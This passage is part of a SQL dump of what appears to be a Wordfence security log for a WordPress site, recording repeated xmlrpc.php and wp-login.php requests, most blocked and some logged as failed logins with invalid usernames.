Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11026,0.000000,1631314147.139260,'\0\0\0\0\0\0\0\0\0\0��>���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11027,0.000000,1631314755.781445,'\0\0\0\0\0\0\0\0\0\0���c�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11028,0.000000,1631315378.212450,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11029,0.000000,1631316006.856702,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11030,0.000000,1631316639.507580,'\0\0\0\0\0\0\0\0\0\0���.{*',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11031,0.000000,1631317269.919545,'\0\0\0\0\0\0\0\0\0\0��l�7�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11032,0.000000,1631317883.574890,'\0\0\0\0\0\0\0\0\0\0��>��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11033,0.000000,1631318563.416104,'\0\0\0\0\0\0\0\0\0\0��3�8�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11034,0.000000,1631319255.846683,'\0\0\0\0\0\0\0\0\0\0���t�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11035,0.000000,1631319870.295287,'\0\0\0\0\0\0\0\0\0\0����)�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11036,0.000000,1631320131.686069,'\0\0\0\0\0\0\0\0\0\0��-��^',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1901.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11037,0.000000,1631320535.117751,'\0\0\0\0\0\0\0\0\0\0��@Z(d',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11038,0.000000,1631321212.236110,'\0\0\0\0\0\0\0\0\0\0��|(��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11039,0.000000,1631321889.147935,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(11040,0.000000,1631322541.752230,'\0\0\0\0\0\0\0\0\0\0����X�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11041,0.000000,1631323263.681339,'\0\0\0\0\0\0\0\0\0\0��)]R',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11042,0.000000,1631323961.894652,'\0\0\0\0\0\0\0\0\0\0���>n�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11043,0.000000,1631324657.689428,'\0\0\0\0\0\0\0\0\0\0��>��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11044,0.000000,1631325357.824590,'\0\0\0\0\0\0\0\0\0\0����kQ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11045,0.000000,1631326096.986344,'\0\0\0\0\0\0\0\0\0\0��\r�\0P',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11046,0.000000,1631326821.046587,'\0\0\0\0\0\0\0\0\0\0���]�c',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11047,0.000000,1631327307.225653,'\0\0\0\0\0\0\0\0\0\0��#�1�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11048,0.000000,1631328021.638651,'\0\0\0\0\0\0\0\0\0\0����~�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11049,0.000000,1631328766.886890,'\0\0\0\0\0\0\0\0\0\0�����8',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11050,0.000000,1631330267.148587,'\0\0\0\0\0\0\0\0\0\0��h�-�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11051,0.000000,1631331043.910426,'\0\0\0\0\0\0\0\0\0\0���.yB',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11052,0.000000,1631332428.803477,'\0\0\0\0\0\0\0\0\0\0��l�7�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11053,0.000000,1631332975.374105,'\0\0\0\0\0\0\0\0\0\0��g�\n�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11054,0.000000,1631333511.103053,'\0\0\0\0\0\0\0\0\0\0��U���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11055,0.000000,1631334000.808429,'\0\0\0\0\0\0\0\0\0\0��N�Q�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11056,0.000000,1631334478.790324,'\0\0\0\0\0\0\0\0\0\0��\r^�,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11057,0.000000,1631334529.981935,'\0\0\0\0\0\0\0\0\0\0��E2',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.google.com/','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11058,0.000000,1631335475.602701,'\0\0\0\0\0\0\0\0\0\0���F��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11059,0.000000,1631335950.624624,'\0\0\0\0\0\0\0\0\0\0���_',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11060,0.000000,1631336463.010669,'\0\0\0\0\0\0\0\0\0\0��>��',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(11061,0.000000,1631336983.487357,'\0\0\0\0\0\0\0\0\0\0��h�+�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11062,0.000000,1631337475.123585,'\0\0\0\0\0\0\0\0\0\0��/aP3',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11063,0.000000,1631337979.723307,'\0\0\0\0\0\0\0\0\0\0��Bs�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11064,0.000000,1631338461.428002,'\0\0\0\0\0\0\0\0\0\0���ҥ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11065,0.000000,1631338587.801324,'\0\0\0\0\0\0\0\0\0\0��h�K!',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','https://www.google.com/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)','loginFailInvalidUsername',NULL,NULL),(11066,0.000000,1631338972.966352,'\0\0\0\0\0\0\0\0\0\0��[��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11067,0.000000,1631339441.458750,'\0\0\0\0\0\0\0\0\0\0���$-I',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11068,0.000000,1631339926.245920,'\0\0\0\0\0\0\0\0\0\0��xO�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11069,0.000000,1631340377.016076,'\0\0\0\0\0\0\0\0\0\0����vH',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11070,0.000000,1631340901.606734,'\0\0\0\0\0\0\0\0\0\0���D�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11071,0.000000,1631341417.297773,'\0\0\0\0\0\0\0\0\0\0��6\'iX',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11072,0.000000,1631341912.654669,'\0\0\0\0\0\0\0\0\0\0��£�#',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11073,0.000000,1631342430.383186,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11074,0.000000,1631342943.314340,'\0\0\0\0\0\0\0\0\0\0��m�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11075,0.000000,1631343447.938486,'\0\0\0\0\0\0\0\0\0\0��#�Z',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11076,0.000000,1631344000.769598,'\0\0\0\0\0\0\0\0\0\0�����1',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11077,0.000000,1631344522.734934,'\0\0\0\0\0\0\0\0\0\0��/4�*',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11078,0.000000,1631345061.253310,'\0\0\0\0\0\0\0\0\0\0��@��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11079,0.000000,1631345596.934490,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11080,0.000000,1631346127.770491,'\0\0\0\0\0\0\0\0\0\0���]�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11081,0.000000,1631346645.728116,'\0\0\0\0\0\0\0\0\0\0��+���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11082,0.000000,1631347188.742118,'\0\0\0\0\0\0\0\0\0\0���;=�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11083,0.000000,1631347759.211740,'\0\0\0\0\0\0\0\0\0\0��\r$n�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11084,0.000000,1631348323.441921,'\0\0\0\0\0\0\0\0\0\0���H�l',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11085,0.000000,1631349429.668364,'\0\0\0\0\0\0\0\0\0\0��gZ�[',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11086,0.000000,1631350029.640968,'\0\0\0\0\0\0\0\0\0\0��g�t�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11087,0.000000,1631350593.801143,'\0\0\0\0\0\0\0\0\0\0��$\\',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11088,0.000000,1631351176.671292,'\0\0\0\0\0\0\0\0\0\0��6&.�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11089,0.000000,1631351756.628607,'\0\0\0\0\0\0\0\0\0\0��-=��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11090,0.000000,1631352335.685677,'\0\0\0\0\0\0\0\0\0\0��t���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11091,0.000000,1631352921.453741,'\0\0\0\0\0\0\0\0\0\0��m��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11092,0.000000,1631353501.256105,'\0\0\0\0\0\0\0\0\0\0��=C�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11093,0.000000,1631354093.398706,'\0\0\0\0\0\0\0\0\0\0��\r^�,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11094,0.000000,1631354690.707441,'\0\0\0\0\0\0\0\0\0\0��g��E',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11095,0.000000,1631355297.435044,'\0\0\0\0\0\0\0\0\0\0��\r$n�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11096,0.000000,1631355903.448344,'\0\0\0\0\0\0\0\0\0\0��#�K',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11097,0.000000,1631356504.588516,'\0\0\0\0\0\0\0\0\0\0���~�@',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11098,0.000000,1631357084.101497,'\0\0\0\0\0\0\0\0\0\0��e%�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11099,0.000000,1631357718.192051,'\0\0\0\0\0\0\0\0\0\0��g�t2',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11100,0.000000,1631358320.359551,'\0\0\0\0\0\0\0\0\0\0��k��\n',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11101,0.000000,1631359548.850182,'\0\0\0\0\0\0\0\0\0\0��k��\n',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11102,0.000000,1631360175.819402,'\0\0\0\0\0\0\0\0\0\0��g9��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11103,0.000000,1631360803.839603,'\0\0\0\0\0\0\0\0\0\0��gR',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11104,0.000000,1631361056.337672,'\0\0\0\0\0\0\0\0\0\0��I[� ',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11105,0.000000,1631361070.081203,'\0\0\0\0\0\0\0\0\0\0��I[� ',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11106,0.000000,1631361083.816520,'\0\0\0\0\0\0\0\0\0\0��I[� ',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11107,0.000000,1631361093.260766,'\0\0\0\0\0\0\0\0\0\0��I[� ',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11108,0.000000,1631361105.153952,'\0\0\0\0\0\0\0\0\0\0��I[� ',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11109,0.000000,1631361115.214500,'\0\0\0\0\0\0\0\0\0\0��I[� ',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11110,0.000000,1631361125.048484,'\0\0\0\0\0\0\0\0\0\0��I[� ',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11111,0.000000,1631361472.556443,'\0\0\0\0\0\0\0\0\0\0��sU',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(11112,0.000000,1631362128.399850,'\0\0\0\0\0\0\0\0\0\0��?�)',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11113,0.000000,1631362773.370298,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11114,0.000000,1631363407.931105,'\0\0\0\0\0\0\0\0\0\0��D���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11115,0.000000,1631364098.523060,'\0\0\0\0\0\0\0\0\0\0����&�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11116,0.000000,1631364733.641561,'\0\0\0\0\0\0\0\0\0\0��k�X�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11117,0.000000,1631365062.683082,'\0\0\0\0\0\0\0\0\0\0��-��^',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, 